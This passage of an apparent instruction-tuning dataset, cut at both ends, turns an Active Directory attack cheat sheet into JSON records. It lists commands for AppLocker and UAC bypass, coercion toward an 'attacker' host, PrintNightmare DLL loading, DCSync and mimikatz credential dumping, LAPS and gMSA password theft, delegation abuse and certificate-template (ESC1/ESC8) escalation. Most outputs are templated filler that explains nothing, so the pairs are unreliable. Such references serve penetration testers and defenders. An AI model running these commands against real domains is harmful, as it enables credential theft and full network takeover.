-p '' -M get-desc-users |grep -i MSOL", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Can Connect to a computer", "input": "Lateral move", "output": "Note or procedural step under 'Can Connect to a computer'."} {"instruction": "Exploit", "input": "know vulnerabilities", "output": "Note or procedural step under 'Exploit'."} {"instruction": "Bypass Applocker", "input": "Get-Applocker infos", "output": "Note or procedural step under 'Bypass Applocker'."} {"instruction": "Bypass Applocker", "input": "Get-ChildItem -Path HKLM:\\SOFTWARE\\Policies \\Microsoft\\Windows\\SrpV2\\Exe (dll/msi/...)", "output": "Note or procedural step under 'Bypass Applocker'."} {"instruction": "Bypass Applocker", "input": "files in writables paths", "output": "Note or procedural step under 'Bypass Applocker'."} {"instruction": "Bypass Applocker", "input": "C:\\Windows\\Temp", "output": "Note or procedural step under 'Bypass Applocker'."} {"instruction": "Bypass Applocker", "input": "C:\\Windows\\Tasks", "output": "Note or procedural step under 'Bypass Applocker'."} {"instruction": "Bypass Applocker", "input": "installutil.exe /logfile= /LogToConsole=false /U C:\\runme.exe", "output": "Note or procedural step under 'Bypass Applocker'."} {"instruction": "Bypass Applocker", "input": "mshta.exe my.hta", "output": "Note or procedural step under 'Bypass Applocker'."} {"instruction": "Bypass Applocker", "input": "MsBuild.exe pshell.xml", "output": "Note or procedural step under 'Bypass Applocker'."} {"instruction": "UAC bypass", "input": "Fodhelper.exe", "output": "Note or procedural step under 'UAC bypass'."} {"instruction": "UAC bypass", "input": "wsreset.exe", "output": "Note or procedural step under 'UAC bypass'."} {"instruction": "UAC bypass", "input": "msdt.exe", "output": "Note or procedural step under 'UAC bypass'."} {"instruction": "Auto Enum", "input": "winPEASany_ofs.exe", "output": "Note or procedural step under 'Auto Enum'."} {"instruction": "Auto Enum", "input": ".\\PrivescCheck.ps1; Invoke-PrivescCheck -Extended\"", "output": "Note or procedural step under 'Auto Enum'."} {"instruction": "Search files", "input": "findstr /si 'pass' *.txt *.xml *.docx *.ini", "output": "Note or procedural step under 'Search files'."} {"instruction": "Exploit", "input": "SMBGhost CVE-2020-0796", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Exploit", "input": "CVE-2021-36934 (HiveNightmare/SeriousSAM)", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "Exploit", "input": "vssadmin list shadows", "output": "Note or procedural step under 'Exploit'."} {"instruction": "Webdav", "input": "open file .searchConnector-ms", "output": "Note or procedural step under 'Webdav'."} {"instruction": "Webdav", "input": "dnstool.py -u \\ -p --record 'attacker' --action add --data ", "output": "Note or procedural step under 'Webdav'."} {"instruction": "Webdav", "input": "petitpotam.py -u '' -p -d '' \"attacker@80/random.txt\" ", "output": "Note or procedural step under 'Webdav'."} {"instruction": "Kerberos Relay", "input": "KrbRelayUp.exe relay -Domain -CreateNewComputerAccount -ComputerName -ComputerPassword ", "output": "Note or procedural step under 'Kerberos Relay'."} {"instruction": "Kerberos Relay", "input": "KrbRelayUp.exe spawn -m rbcd -d -dc -cn -cp ", "output": "Note or procedural step under 'Kerberos Relay'."} {"instruction": "From Service account (SEImpersonate)", "input": "RoguePatato", "output": "Note or procedural step under 'From Service account (SEImpersonate)'."} {"instruction": "From Service account (SEImpersonate)", "input": "GodPotato", "output": "Note or procedural step under 'From Service account (SEImpersonate)'."} {"instruction": "From Service account (SEImpersonate)", "input": "PrintSpoofer", "output": "Note or procedural step under 'From Service account (SEImpersonate)'."} {"instruction": "From Service account (SEImpersonate)", "input": "RemotePotato0", "output": "Note or procedural step under 'From Service account (SEImpersonate)'."} {"instruction": "MS14-068", "input": "findSMB2UPTime.py ", "output": "Note or procedural step under 'MS14-068'."} {"instruction": "MS14-068", "input": "ms14-068.py -u @ -p -s -d ", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "MS14-068", "input": "msf> use auxiliary/admin/kerberos/ms14_068_kerberos_checksum", "output": "Tool or command referenced under 'MS14-068'."} {"instruction": "MS14-068", "input": "goldenPac.py -dc-ip /:@target", "output": "Note or procedural step under 'MS14-068'."} {"instruction": "GPP MS14-025", "input": "msf> use auxiliary/scanner/smb/smb_enum_gpp", "output": "Tool or command referenced under 'GPP MS14-025'."} {"instruction": "GPP MS14-025", "input": "findstr /S /I cpassword \\\\\\sysvol\\\\policies\\*.xml", "output": "Note or procedural step under 'GPP MS14-025'."} {"instruction": "GPP MS14-025", "input": "Get-GPPPassword.py /:@", "output": "Note or procedural step under 'GPP MS14-025'."} {"instruction": "PrivExchange (CVE-2019-0724, CVE-2019-0686)", "input": "privexchange.py -ah -u -d -p ", "output": "Note or procedural step under 'PrivExchange (CVE-2019-0724, CVE-2019-0686)'."} {"instruction": "noPac (CVE-2021-42287, CVE-2021-42278)", "input": "nxc smb -u 'user' -p 'pass' -M nopac #scan", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "noPac (CVE-2021-42287, CVE-2021-42278)", "input": "noPac.exe -domain -user -pass /dc /mAccount /mPassword /service cifs /ptt", "output": "Note or procedural step under 'noPac (CVE-2021-42287, CVE-2021-42278)'."} {"instruction": "PrintNightmare (CVE-2021-1675, CVE-2021-34527)", "input": "nxc smb -u 'user' -p 'pass' -M printnightmare #scan", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "PrintNightmare (CVE-2021-1675, CVE-2021-34527)", "input": "printnightmare.py -dll '\\\\\\smb\\add_user.dll' ':@", "output": "Note or procedural step under 'PrintNightmare (CVE-2021-1675, CVE-2021-34527)'."} {"instruction": "Certifried (CVE-2022-26923)", "input": "Create account", "output": "Note or procedural step under 'Certifried (CVE-2022-26923)'."} {"instruction": "Certifried (CVE-2022-26923)", "input": "certipy account create -u @ -p '' -user 'certifriedpc' -pass 'certifriedpass' -dns ''", "output": "Note or procedural step under 'Certifried (CVE-2022-26923)'."} {"instruction": "Certifried (CVE-2022-26923)", "input": "Request", "output": "Note or procedural step under 'Certifried (CVE-2022-26923)'."} {"instruction": "Certifried (CVE-2022-26923)", "input": "certipy req -u 'certifriedpc$'@ -p 'certifriedpass' -target -ca -template Machine", "output": "Note or procedural step under 'Certifried (CVE-2022-26923)'."} {"instruction": "Certifried (CVE-2022-26923)", "input": "Authentication", "output": "Note or procedural step under 'Certifried (CVE-2022-26923)'."} {"instruction": "Certifried (CVE-2022-26923)", "input": "certipy auth -pfx -username '$' -domain -dc-ip ", "output": "Note or procedural step under 'Certifried (CVE-2022-26923)'."} {"instruction": "ProxyNotShell (CVE-2022-41040, CVE-2022-41082)", "input": "poc_aug3.py ", "output": "Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'."} {"instruction": "ProxyNotShell (CVE-2022-41040, CVE-2022-41082)", "input": "ACLs/ACEs permissions", "output": "Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'."} {"instruction": "Dcsync", "input": "Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts", "output": "Note or procedural step under 'Dcsync'."} {"instruction": "Dcsync", "input": "mimikatz lsadump::dcsync /domain: /user:\\administrator", "output": "Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints."} {"instruction": "Dcsync", "input": "secretsdump.py ''/'':''@''", "output": "Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints."} {"instruction": "Can change msDS-KeyCredentialLInk (Generic Write) + ADCS", "input": "Shadow Credentials", "output": "Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'."} {"instruction": "Can change msDS-KeyCredentialLInk (Generic Write) + ADCS", "input": "certipy shadow auto '-u @' -p -account ''", "output": "Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'."} {"instruction": "Can change msDS-KeyCredentialLInk (Generic Write) + ADCS", "input": "pywhisker.py -d \"FQDN_DOMAIN\" -u \"user1\" -p \"CERTIFICATE_PASSWORD\" --target \"TARGET_SAMNAME\" --action \"list\"", "output": "Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'."} {"instruction": "On Group", "input": "GenericAll/GenericWrite/Self/Add Extended Rights", "output": "Note or procedural step under 'On Group'."} {"instruction": "On Group", "input": "Add member to the group", "output": "Note or procedural step under 'On Group'."} {"instruction": "On Group", "input": "Write Owner", "output": "Note or procedural step under 'On Group'."} {"instruction": "On Group", "input": "Grant Ownership", "output": "Note or procedural step under 'On Group'."} {"instruction": "On Group", "input": "WriteDACL + WriteOwner", "output": "Note or procedural step under 'On Group'."} {"instruction": "On Group", "input": "Grant rights", "output": "Note or procedural step under 'On Group'."} {"instruction": "On Group", "input": "Give yourself generic all", "output": "Note or procedural step under 'On Group'."} {"instruction": "On Computer", "input": "GenericAll / GenericWrite", "output": "Note or procedural step under 'On Computer'."} {"instruction": "On Computer", "input": "msDs-AllowedToActOnBehalf", "output": "Note or procedural step under 'On Computer'."} {"instruction": "On Computer", "input": "add Key Credentials", "output": "Note or procedural step under 'On Computer'."} {"instruction": "On User", "input": "GenericAll / GenericWrite", "output": "Note or procedural step under 'On User'."} {"instruction": "On User", "input": "Change password", "output": "Note or procedural step under 'On User'."} {"instruction": "On User", "input": "add SPN (target kerberoasting)", "output": "Note or procedural step under 'On User'."} {"instruction": "On User", "input": "add key credentials", "output": "Note or procedural step under 'On User'."} {"instruction": "On User", "input": "login script", "output": "Note or procedural step under 'On User'."} {"instruction": "On User", "input": "ForceChangePassword", "output": "Note or procedural step under 'On User'."} {"instruction": "On User", "input": "net user /domain", "output": "Note or procedural step under 'On User'."} {"instruction": "On OU", "input": "Write Dacl", "output": "Note or procedural step under 'On OU'."} {"instruction": "On OU", "input": "ACE Inheritance", "output": "Note or procedural step under 'On OU'."} {"instruction": "On OU", "input": "Grant rights", "output": "Note or procedural step under 'On OU'."} {"instruction": "On OU", "input": "GenericAll / GenericWrite / Manage Group Policy Links", "output": "Note or procedural step under 'On OU'."} {"instruction": "On OU", "input": "OUned.py --config config.ini", "output": "Note or procedural step under 'On OU'."} {"instruction": "ReadGMSAPassword", "input": "gMSADumper.py -u '' -p '' -d ''", "output": "Note or procedural step under 'ReadGMSAPassword'."} {"instruction": "ReadGMSAPassword", "input": "nxc ldap -u -p --gmsa", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "ReadGMSAPassword", "input": "ldeep ldap -u -p -d -s ldaps:// gmsa", "output": "Note or procedural step under 'ReadGMSAPassword'."} {"instruction": "Get LAPS passwords", "input": "Who can read LAPS", "output": "Note or procedural step under 'Get LAPS passwords'."} {"instruction": "Get LAPS passwords", "input": "MATCH p=(g:Base)-[:ReadLAPSPassword]->(c:Computer) RETURN p", "output": "Note or procedural step under 'Get LAPS passwords'."} {"instruction": "Get LAPS passwords", "input": "Read LAPS", "output": "Note or procedural step under 'Get LAPS passwords'."} {"instruction": "Get LAPS passwords", "input": "Get-LapsADPassword -DomainController -Credential \\ | Format-Table -AutoSize", "output": "Note or procedural step under 'Get LAPS passwords'."} {"instruction": "Get LAPS passwords", "input": "ldeep ldap -u -p -d -s ldap:// laps", "output": "Note or procedural step under 'Get LAPS passwords'."} {"instruction": "Get LAPS passwords", "input": "foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}", "output": "Note or procedural step under 'Get LAPS passwords'."} {"instruction": "Get LAPS passwords", "input": "nxc ldap -d -u -p --module laps", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."} {"instruction": "Get LAPS passwords", "input": "msf> use post/windows/gather/credentials/enum_laps", "output": "Tool or command referenced under 'Get LAPS passwords'."} {"instruction": "GPO", "input": "Who can control GPOs", "output": "Note or procedural step under 'GPO'."} {"instruction": "GPO", "input": "MATCH p=((n:Base)-[]->(gp:GPO)) RETURN p", "output": "Note or procedural step under 'GPO'."} {"instruction": "GPO", "input": "SID of principals that can create new GPOs in the domain", "output": "Note or procedural step under 'GPO'."} {"instruction": "GPO", "input": "Get-DomainObjectAcl -SearchBase \"CN=Policies,CN=System,DC=blah,DC=com\" -ResolveGUIDs | ? { $_.ObjectAceType -eq \"Group-Policy-Container\" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl", "output": "Note or procedural step under 'GPO'."} {"instruction": "GPO", "input": "Return the principals that can write to the GP-Link attribute on OUs", "output": "Note or procedural step under 'GPO'."} {"instruction": "GPO", "input": "Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq \"GP-Link\" -and $_.ActiveDirectoryRights -match \"WriteProperty\" } | select ObjectDN, SecurityIdentifier | fl", "output": "Note or procedural step under 'GPO'."} {"instruction": "GPO", "input": "Generic Write on GPO", "output": "Note or procedural step under 'GPO'."} {"instruction": "GPO", "input": "Abuse GPO", "output": "Note or procedural step under 'GPO'."} {"instruction": "DNS Admin", "input": "DNSadmins abuse (CVE-2021-40469)", "output": "Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance."} {"instruction": "DNS Admin", "input": "dnscmd.exe /config /serverlevelplugindll <\\\\path\\to\\dll> # need a dnsadmin user", "output": "Note or procedural step under 'DNS Admin'."} {"instruction": "DNS Admin", "input": "sc \\\\DNSServer stop dns sc \\\\DNSServer start dns", "output": "Note or procedural step under 'DNS Admin'."} {"instruction": "Find delegation", "input": "findDelegation.py \"\"/\"\":\"\"", "output": "Note or procedural step under 'Find delegation'."} {"instruction": "Find delegation", "input": "With BloodHound", "output": "Note or procedural step under 'Find delegation'."} {"instruction": "Find delegation", "input": "Unconstrained", "output": "Note or procedural step under 'Find delegation'."} {"instruction": "Find delegation", "input": "MATCH (c:Computer {unconstraineddelegation:true}) RETURN c", "output": "Note or procedural step under 'Find delegation'."} {"instruction": "Find delegation", "input": "MATCH (c:User {unconstraineddelegation:true}) RETURN c", "output": "Note or procedural step under 'Find delegation'."} {"instruction": "Find delegation", "input": "Constrained", "output": "Note or procedural step under 'Find delegation'."} {"instruction": "Find delegation", "input": "MATCH p=((c:Base)-[:AllowedToDelegate]->(t:Computer)) RETURN p", "output": "Note or procedural step under 'Find delegation'."} {"instruction": "Find delegation", "input": "MATCH p=shortestPath((u:User)-[*1..]->(c:Computer {name: \"\"})) RETURN p", "output": "Note or procedural step under 'Find delegation'."} {"instruction": "Unconstrained delegation", "input": "UAC: ADS_UF_TRUSTED_FOR_DELEGATION", "output": "Note or procedural step under 'Unconstrained delegation'."} {"instruction": "Unconstrained delegation", "input": "Force connection with coerce", "output": "Note or procedural step under 'Unconstrained delegation'."} {"instruction": "Unconstrained delegation", "input": "Get tickets", "output": "Note or procedural step under 'Unconstrained delegation'."} {"instruction": "Unconstrained delegation", "input": "mimikatz privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export", "output": "Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints."} {"instruction": "Unconstrained delegation", "input": "Rubeus.exe dump /service:krbtgt /nowrap", "output": "Tool or command referenced under 'Unconstrained delegation'."} {"instruction": "Unconstrained delegation", "input": "Rubeus.exe dump /luid:0xdeadbeef /nowrap", "output": "Tool or command referenced under 'Unconstrained delegation'."} {"instruction": "Unconstrained delegation", "input": "Rubeus.exe monitor /interval:5", "output": "Tool or command referenced under 'Unconstrained delegation'."} {"instruction": "Constrained delegation", "input": "With protocol transition (any) UAC: TRUST_TO_AUTH_FOR_DELEGATION", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Get TGT for user", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Request S4u2self", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Request S4u2proxy", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Rubeus.exe hash /password:", "output": "Tool or command referenced under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Rubeus.exe asktgt /user: /domain: /aes256:", "output": "Tool or command referenced under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Rubeus.exe s4u /ticket: /impersonateuser: /msdsspn: /altservice: /ptt", "output": "Tool or command referenced under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Altservice HTTP/HOST/CIFS/LDAP", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "getST.py -spn '/' -impersonate Administrator -dc-ip '' '/:' -altservice ", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Altservice HTTP/HOST/CIFS/LDAP", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Without protocol transition (kerberos only) UAC: TRUSTED_FOR_DELEGATION", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Constrain between Y and Z", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Add computer X", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Add RBCD : delegate from X to Y", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "s4u2self X (impersonate admin)", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "S4u2Proxy X (impersonate admin on spn/Y)", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Forwardable TGS for Y", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "S4u2Proxy Y (impersonate admin on spn/Z)", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "add computer account", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "addcomputer.py -computer-name '' -computer-pass '' -dc-host -domain-netbios '/:'", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "RBCD With added computer account", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "rbcd.py -delegate-from '$' -delegate-to '$' -dc-ip '' -action 'write' -hashes '' /$", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "getST.py -spn host/ -impersonate Administrator --dc-ip '/$:'", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "getST.py -spn / -hashes '' '/$' -impersonate Administrator --dc-ip -additional-ticket ", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Self RBCD", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Constrained delegation", "input": "Like RBCD without add computer", "output": "Note or procedural step under 'Constrained delegation'."} {"instruction": "Resource-Based Constrained Delegation", "input": "add computer account", "output": "Note or procedural step under 'Resource-Based Constrained Delegation'."} {"instruction": "Resource-Based Constrained Delegation", "input": "addcomputer.py -computer-name '' -computer-pass '' -dc-host -domain-netbios '/:'", "output": "Note or procedural step under 'Resource-Based Constrained Delegation'."} {"instruction": "Resource-Based Constrained Delegation", "input": "RBCD With added computer account", "output": "Note or procedural step under 'Resource-Based Constrained Delegation'."} {"instruction": "Resource-Based Constrained Delegation", "input": "Rubeus.exe hash /password: /user: /domain:", "output": "Tool or command referenced under 'Resource-Based Constrained Delegation'."} {"instruction": "Resource-Based Constrained Delegation", "input": "Rubeus.exe s4u /user: /aes256: /impersonateuser:administrator /msdsspn:cifs/ /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt", "output": "Tool or command referenced under 'Resource-Based Constrained Delegation'."} {"instruction": "Resource-Based Constrained Delegation", "input": "rbcd.py -delegate-from '$' -delegate-to '$' -dc-ip '' -action 'write' /:", "output": "Note or procedural step under 'Resource-Based Constrained Delegation'."} {"instruction": "Resource-Based Constrained Delegation", "input": "getST.py -spn host/ '/:' -impersonate Administrator --dc-ip #Kerberos TGT", "output": "Note or procedural step under 'Resource-Based Constrained Delegation'."} {"instruction": "S4U2self abuse", "input": "Get machine account (X)'s TGT", "output": "Note or procedural step under 'S4U2self abuse'."} {"instruction": "S4U2self abuse", "input": "Get a ST on X as user admin", "output": "Note or procedural step under 'S4U2self abuse'."} {"instruction": "S4U2self abuse", "input": "getTGT.py -dc-ip \"\" -hashes :\"\" \"\"/\"$\"", "output": "Note or procedural step under 'S4U2self abuse'."} {"instruction": "S4U2self abuse", "input": "getST.py -self -impersonate \"\" -altservice \"cifs/\" -k -no-pass -dc-ip \"DomainController\" \"\"/'$' #Admin", "output": "Note or procedural step under 'S4U2self abuse'."} {"instruction": "Enumeration", "input": "certutil -v -dsTemplate", "output": "Note or procedural step under 'Enumeration'."} {"instruction": "Enumeration", "input": "certify.exe find [ /vulnerable]", "output": "Note or procedural step under 'Enumeration'."} {"instruction": "Enumeration", "input": "certipy find -u @ -p -dc-ip ", "output": "Note or procedural step under 'Enumeration'."} {"instruction": "Enumeration", "input": "ldeep ldap -u -p -d -s templates", "output": "Note or procedural step under 'Enumeration'."} {"instruction": "Enumeration", "input": "Get PKI objects information", "output": "Note or procedural step under 'Enumeration'."} {"instruction": "Enumeration", "input": "certify.exe pkiobjects", "output": "Note or procedural step under 'Enumeration'."} {"instruction": "Enumeration", "input": "Display CA information", "output": "Note or procedural step under 'Enumeration'."} {"instruction": "Enumeration", "input": "certutil -TCAInfo", "output": "Note or procedural step under 'Enumeration'."} {"instruction": "Enumeration", "input": "certify.exe cas", "output": "Note or procedural step under 'Enumeration'."} {"instruction": "Web Enrollment Is Up", "input": "ESC8", "output": "Note or procedural step under 'Web Enrollment Is Up'."} {"instruction": "Web Enrollment Is Up", "input": "ntlmrelayx.py -t http:///certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController", "output": "Note or procedural step under 'Web Enrollment Is Up'."} {"instruction": "Web Enrollment Is Up", "input": "Rubeus.exe asktgt /user: /certificate: /ptt", "output": "Tool or command referenced under 'Web Enrollment Is Up'."} {"instruction": "Web Enrollment Is Up", "input": "gettgtpkinit.py -pfx-base64 $(cat cert.b64) /$ ", "output": "Note or procedural step under 'Web Enrollment Is Up'."} {"instruction": "Web Enrollment Is Up", "input": "certipy relay -target http://", "output": "Note or procedural step under 'Web Enrollment Is Up'."} {"instruction": "Web Enrollment Is Up", "input": "certipy auth -pfx -dc-ip ", "output": "Note or procedural step under 'Web Enrollment Is Up'."} {"instruction": "Misconfigured Certificate Template", "input": "ESC1", "output": "Note or procedural step under 'Misconfigured Certificate Template'."} {"instruction": "Misconfigured Certificate Template", "input": "certipy req -u @ -p -target -template '' -ca -upn @", "output": "Note or procedural step under 'Misconfigured Certificate Template'."} {"instruction": "Misconfigured Certificate Template", "input": "certify.exe request /ca:\\ /template:\"\" [/altname:\"Admin\"]", "output": "Note or procedural step under 'Misconfigured Certificate Template'."} {"instruction": "Misconfigured Certificate Template", "input": "ESC2", "output": "Note or procedural step under 'Misconfigured Certificate Template'."} {"instruction": "Misconfigured Certificate Template", "input": "ESC3", "output": "Note or procedural step under 'Misconfigured Certificate Template'."} {"instruction": "Misconfigured Certificate Template", "input": "ESC3", "output": "Note or procedural step under 'Misconfigured Certificate Template'."} {"instruction": "Misconfigured Certificate Template", "input": "certify.exe request /ca:\\ /template:\"\"", "output": "Note or procedural step under 'Misconfigured Certificate Template'."} {"instruction": "Misconfigured Certificate Template", "input": "certify.exe request request /ca:\\ /template: